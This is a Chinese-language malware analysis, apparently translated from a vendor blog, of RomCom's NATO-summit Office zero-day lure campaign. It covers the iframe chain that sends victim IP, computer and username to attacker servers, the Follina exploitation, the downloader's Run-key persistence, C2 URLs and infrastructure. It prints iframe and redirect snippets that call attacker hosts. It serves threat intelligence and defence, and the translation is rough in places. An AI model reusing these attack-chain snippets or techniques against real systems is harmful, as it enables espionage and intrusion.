北约峰会Office 0 day攻击样本（CVE-2023-36884）

攻击样本：

https://www.joesecurity.org/reports/report-d227874863036b8e73a3894a19bd25a0.htmlMD5：d227874863036b8e73a3894a19bd25a0SHA1：2400b169ee2c38ac146c67408debc9b4fa4fca5fSHA256：a61b2eafcf39715031357df6b01e85e0d1ea2e8ee1dfec241b114e18f7a1163fNAME:Overview_of_UWCs_UkraineInNATO_campaign.docx.doc

概括

7 月 4 日，黑莓威胁研究和情报团队发现了两份从匈牙利 IP 地址提交的恶意文件，作为诱饵发送给海外支持乌克兰的组织，以及一份针对即将到来的北约峰会嘉宾的文件，这些嘉宾也可能为乌克兰提供支持。

我们基于战术、技术和程序 (TTP)、代码相似性以及威胁行为者网络基础设施的分析得出结论，名为RomCom的威胁行为者很可能是此次行动的幕后黑手。

根据我们的内部遥测、网络数据分析以及我们收集的全套网络武器，我们认为此次活动背后的威胁行为者于 6 月 22 日以及指挥与控制 (C2) 实施前几天进行了首次演习。本报告中提到的）已注册并上线。

23 年 7 月 10 日更新： 请注意，黑莓在发布此博客的几天前与相关政府机构分享了此情报。

武器化和技术概述

技术分析

语境

立陶宛将于 7 月 11 日至 12 日在维尔纽斯主办北约峰会。议程上的主题之一是乌克兰及其未来可能加入该组织。乌克兰总统泽连斯基确认参加。

利用这一事件和乌克兰加入北约的请求，威胁行为者创建并分发了一份冒充乌克兰世界大会组织的恶意文件，大概是分发给乌克兰的支持者。

图 1：在这次攻击中用作诱饵的 Word 文档

该文档中使用的感染技术是 RTF 利用，一旦受害者打开文档，就会从受害者的计算机发起出站连接。

我们还发现了来自同一威胁参与者的另一个恶意文件，我们认为这是围绕即将举行的北约峰会的诱惑。本质上，这是一份支持乌克兰的虚假游说文件。

图 2：与此次入侵相关的第二份文档

攻击向量

尽管我们尚未发现最初的感染媒介，但威胁行为者可能依赖鱼叉式网络钓鱼技术，诱使受害者点击乌克兰世界大会网站的特制复制品。

恶意域名使用域名仿冒技术来伪装带有 .info 后缀的虚假网站，并使其看起来合法。

图 3：辨别合法和假冒的乌克兰世界大会网站之间的区别

检查该假网站的源代码证明它是原始网站的克隆副本。值得注意的是，该网站注册为 .info 域。

我们观察到 RomCom 威胁参与者在之前的活动中使用了相同的技术。

所观察到的两份文件的详细信息如下：

武器化

如上所述，文档“Overview_of_UWCs_UkraineInNATO_campaign.docx”包含一个名为afchunk.rtf的嵌入式 RTF 文件。

图 5：file001中存储的文件

图6：file001.urlx的一部分

该文件的目标是将 OLE 流加载到 Microsoft Word 中，以呈现负责执行下一阶段恶意软件的 iframe 标记。

它尝试获取计算机的 IP 地址，该地址应在“ ?d= ”参数中传递，然后在/appdata/local/temp/中构建路径。正如我们所观察到的，主 Word 有效负载还有其他通信，将打开文件的用户的 IP 作为参数传递。

• hxxp://74.50.94[.]156/MSHTML_C7/zip_k.asp?d=34.141.245.25_f68f9_
• hxxp://74.50.94[.]156/MSHTML_C7/zip_k2.asp?d=34.141.245.25_f68f9_
• hxxp://74.50.94[.]156/MSHTML_C7/zip_k3.asp?d=34.141.245.25_f68f9_

连接到\104.234.239[.]26share1MSHTML_C7file001.url后，威胁参与者通过 HTTP 与上述三个 URL 中提到的同一服务器建立第二个连接。

图 8：连接期间文件“ start.xml ”的内容

每当用户访问该网站时，服务器中就会自动生成多个文件，以供入侵期间使用。这些文件从 URL hxxp://74.50.94[.]156/share1/MSHTML_C7/1/发送

图 9：威胁行为者捕获的受害者数据

由于存在 iframe 标记，因此您将看到另一个 HTTP 请求自动发送到文件RFile.asp，该文件位于同一路径下。RFile.asp 文件的目标是加载另一个 iframe，其中包含之前自动生成的文件，其中包含受害者的 IP 地址。

图 10：RFile.asp文件的内容

接下来，有 15,000 毫秒（15 秒）的暂停/睡眠。之后，一个 iframe 被加载到之前使用的文件服务器的主路径：file//104.234.239[.]26/share1/MSHTML_C7。最后，执行另一个 iframe 来加载一次文件，该文件由服务器自动生成，其中包含受害者的 IP 地址信息和 5 位数字的附加 ID。要理解该格式，它应该如下所示：

< iframe src = file: //104.234.239[.]26/share1/MSHTML_C7/1/99.99.99.99_a15fa_file001.htm?d=99.99.99.99_ a15fa_></iframe>

99.99.99.99_a15fa_file001.htm

图 11：文件<ipv4>_<id>_file001.htm的开头

该文件的开头开始将变量“ o2010 ”初始化为“False”。之后，它尝试使用 <img> HTML 标记加载 Microsoft Excel 的图标。假设系统中安装了 Microsoft Office14。如果加载了图像，则“ o2010 ”的值将更改为“True”。

以下代码部分创建 5 个 div，其 id 顺序为 1 到 5。第一个包含另一个 iframe 到<ipv4>_<id>_file001.search-ms。虚构的示例可能是 99.99.99.99_a15fa_file001.search-ms。该文件将存储在与 HTML 文件相同的路径中。

图 12：文件<ipv4>_<id>_file001.htm中的脚本标记初始化

该脚本继续初始化脚本标记并创建一些变量以供在此 HTM 文件执行期间使用。

存储这些变量后，它调用 setTimeout 方法在 1.3 秒后 调用函数“ f1() ”。

图 13：<ipv4>_<id>_file001.htm文件中以 f1 开头的函数

以 f1 开头声明了四个不同的函数。皆一一称呼。

• 函数f1()将 ID 为“d1”的 div 的内容更改为内容“<b>!</b>”。然后，它等待 1.3 秒，然后调用函数f1a()。
• 函数f1a()更改 ID 为“d2”的 div 的内容，添加一个新的 iframe，其中包含文件 hxxp://74.50.94[.]156/MSHTML_C7/zip_k.asp?d=99.99.99.99 的内容。加载后，它会等待 1.3 秒，然后调用函数f1b()。
• 函数f1b()也更改 ID 为“d2”的 div 的内容，添加一个新的 iframe，其中包含文件 hxxp://74.50.94[.]156/MSHTML_C7/zip_k2.asp?d=99.99.99.99 的内容。正如您所看到的，该函数与f1a()的区别在于请求的资源是 zip_k2.asp 而不是 zip_k.asp。当 iframe 加载时，它会等待 1.3 秒，然后调用函数f1c()。
• 函数f1c()更改 ID 为“d3”的 div 的内容，添加一个新的 iframe，其中包含文件 hxxp://74.50.94[.]156/MSHTML_C7/zip_k3.asp?d=99.99.99.99 的内容。加载后，它会等待 1.3 秒，然后调用函数f2()。

图 14：<ipv4>_<id>_file001.htm文件结尾

<ipv4>_<id>_file001.htm 文件的末尾包含也加载的其他函数和 iframe。

• 函数f2()更改 ID 为“d1”的 div 的内容，添加一个新的 iframe，其中包含文件 <ipv4>_<id>_file001.search-ms 的内容（示例可以是 99.99.99.99_a15fa_file001.search-多发性硬化症）。ID为“d1”的div的内容与htm文件开头的内容相同。
• 函数f3()验证变量“o2010”是 False 还是 True，并根据该值创建不同的操作。
• o2010 == False：更改 ID 为“d3”的 div 的内容，向 HTML 添加一个新对象（使用该对象代替 iframe 的目的是相同的，都是显示另一个文件）。加载的资源为 redir_obj.html?d=<ipv4>&c=<computer>&u=<username>
• o2010 == True：更改 ID 为“d3”的 div 的内容，添加一个新的 iframe，其中包含文件 hxxp://74.50.94[.]156/MSHTML_C7/o2010.asp?d=99.99.99.99 的内容*

(*) 上面显示的 IP 99.99.99.99 仅用作说明这些连接的示例。

目前显示的某些 iframe 中加载的文件是 .search-ms 文件。这些文件是Windows保存的搜索文件，可以通过Windows进行文件搜索。

该执行链利用了CVE-2022-30190，这是 2022 年 5 月发现的影响 Microsoft 支持诊断工具 (MSDT) 的零日漏洞。

该漏洞也称为Follina，被分配了高严重性 CVSS 评分，随后不久就出现了免费的概念验证 (POC) 漏洞利用代码。

如果成功利用该漏洞，攻击者可以通过制作旨在利用该漏洞的恶意 .docx 或 .rtf 文档来进行基于远程代码执行 (RCE) 的攻击。

这是通过利用特制文档来执行 MSDT 的易受攻击版本来实现的，这反过来又允许攻击者将命令传递给实用程序来执行。这包括使用与执行恶意文档的人相同级别的权限来执行此操作。即使在禁用宏时以及在保护模式下打开文档时，该技术仍然有效。

它是各种威胁行为者利用最严重的威胁之一，包括从 2022 年剩余时间到目前被归类为高级持续威胁 (APT) 的威胁。

在 iframe 链执行期间还会加载其他文件。第一个是redir_obj.html，它接收 GET 请求中的三个值。

图 15：redir_obj.htm文件的开头

该文件的开头与<ipv4>_<id>_file001.htm文件非常相似，其中的目标是获取实际的 URL 和 GET 内容中给出的参数。之后，它获取每个参数存储在 URL 中的索引。

图 16：检查以验证redir_obj.htm文件中的参数

此代码的下一部分用于验证 URL 中给出的参数是否存在。如果是，则变量值为 True；但是，如果这些值不存在，则该值将显示为 False。

图 17：redir_obj.htm文件中的最后一段代码

该 htm 文件的最后一段代码检查所有值是否都设置为 True。如果所有这些都为 true，它将使用 document.write 函数打印下一个值：

<meta http-equiv=refresh content="0;URL=file://computer01/c$/users/bob/appdata/local/temp/temp1_99.99.99.99file001.zip/1111.htm">

上面的示例使用 99.99.99.99 作为“d”参数，computer01 作为“c”参数，bob 值作为“u”参数。

如果任何值未建立，则返回以下内容（在这种情况下，我们尚未为“u”参数创建值）：

<html>d=true<br>c=true<br>u=false</html>

图 18：执行/打开 Word 文档后与 104.234.239[.]26 服务器建立的连接

Agent

有效负载是一个用 C++ 编写的可执行文件。下载器包含许多在执行期间使用的字符串。值得一提的是，我们在几个月前遇到的 RomCom 远程访问木马（RAT）样本中也发现了类似的字符串加密算法。

图 19：下载器中的加密字符串之一。

要使用字符串，程序需要对其进行解密。为此，解密函数获取 64 位密钥来解密数据。该算法使用相当唯一的 64 位密钥作为常量来解密每个字符串。也就是说，每个字符串使用不同的密钥。虽然我们没有发现 RomCom RAT 示例代码使用相同的常量进行解密，但解密字符串的方法与 RomCom RAT 中的实现方式非常相似。

图 20：上图显示了此示例中使用的字符串解密器代码的片段。
Sha-256 (1a7bb878c826fe0ca9a0677ed072ee9a57a228a09ee02b3c5bd00f54f354930f)

图 21：我们几个月前发现的 RomCom RAT 样本。
Sha-256（0501d09a219131657c54dba71faf2b9d793e466f2c7fdf6b0b3c50ec5b866b2a）

我们分析的所有 RomCom RAT 样本都包含字符串加密。这是一种自定义的、相当简单的算法，基于对某个密钥（32 或 64 位）进行 XOR 运算，该密钥作为参数传递给解密函数。基于这些重叠，我们可以以中等到高度的置信度表示，同一运营商或原始 RomCom 运营团队的成员是此次攻击的幕后黑手。

在脚本序列启动最终有效负载（RomCom 下载程序）后，该文件将连接到远程服务器以注册新的受害者。

• hxxp://finformservice[.]com:80/api/v1.5/subscriptiontoken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MTIzNDU2Nzg5LCJuYW1lIjoiSm9zZXBoIn0.OpOSSw7e485LOP5PrzScxHb7SR6sAOMRckfFwi4 RP7O

然后系统中会创建一个特殊的目录和文件。如果攻击者认为受害者感兴趣，则将加载下一阶段的有效负载：

• “C:\Users\Public\AccountPictures\Defender\Security.dll

RomCom 下载程序将 security.dll 写入自动运行以永久存在于系统中。

• SOFTWAREMicrosoftWindowsCurrentVersionRun

成功下载有效负载后，RomCom 下载程序将启动 Windows 服务。

RomCom 下载程序还收集有关其运行的系统的信息。例如：

• 设备 RAM 的大小
• 用户名
• 有关机器网络适配器的信息。

以下是一些将在运行时解密的字符串。

hxxp://65.21.27[.2]50:8080/mds/O--------------------------hxxp://finformservicecom:8080/mds/S-------------------------- hxxp://65.21.27[.]250:8080 /mds/D-------------------------- OneDriveSrvdll CreateServiceWC:WindowsSystem32svchost.exe -k DcomLaunch{2781761 E-28E0-4109-99FE-B9D127C57AFE} SOFTWAREClassesCLSID_sam_SOFTWAREClassesCLSID{F5078F32-C551-11D3-89B9-0000F81FE221}InProcServer32WindowsNTAccessorieswordpad.exeSOFTWAREMicrosoftWindowsCurrentVersionRunDcomLaunchOneDrive Srv

网络基础设施

在跟踪此活动时，我们将单个服务器对多个 C2 和多个受害者 IP 的访问关联起来。该服务器在该活动发生前一周访问了已知的 RomCom 基础设施。从这个中心点 143[.]198.18.163 进行的访问存在严重重叠，这使我们能够以中等到高的置信度声明这两个基础设施背后的威胁行为者是相同的。

图 22：已知 RomCom 行动与即将举行的北约峰会的诱惑之间的网络基础设施关系。

RomCom 威胁参与者控制的 C2 使用与我们之前的 RomCom 博客之一中所述相同的 SSL 证书结构。另一个有趣的时机是 7 月 6 日创建的新证书，使用与其他 RomCom C2 相同的 SSL 证书结构。

图 23：用于准备针对即将到来的北约峰会的攻击的 SSL 结构和时间表

从历史上看，当攻击活动开始利用先前部署了自签名证书的域时，将注册一个公共证书。6 月 29 日，penofach[.]com 为仪表板.penofach[.]com 子域创建了有效的 SSL 证书，并开始托管带有登录页面的仪表板。

图 24：RomCom SSL 信息

目标

根据即将举行的北约峰会的性质以及威胁行为者发出的相关诱骗文件，目标受害者是乌克兰代表、外国组织和支持乌克兰的个人。

结论

根据现有信息，我们有中度到高度的把握得出结论，这是 RomCom 的更名行动，或者 RomCom 威胁组织的一名或多名成员是支持新威胁组织的这一新活动的幕后黑手。我们得出这一结论所依据的信息包括：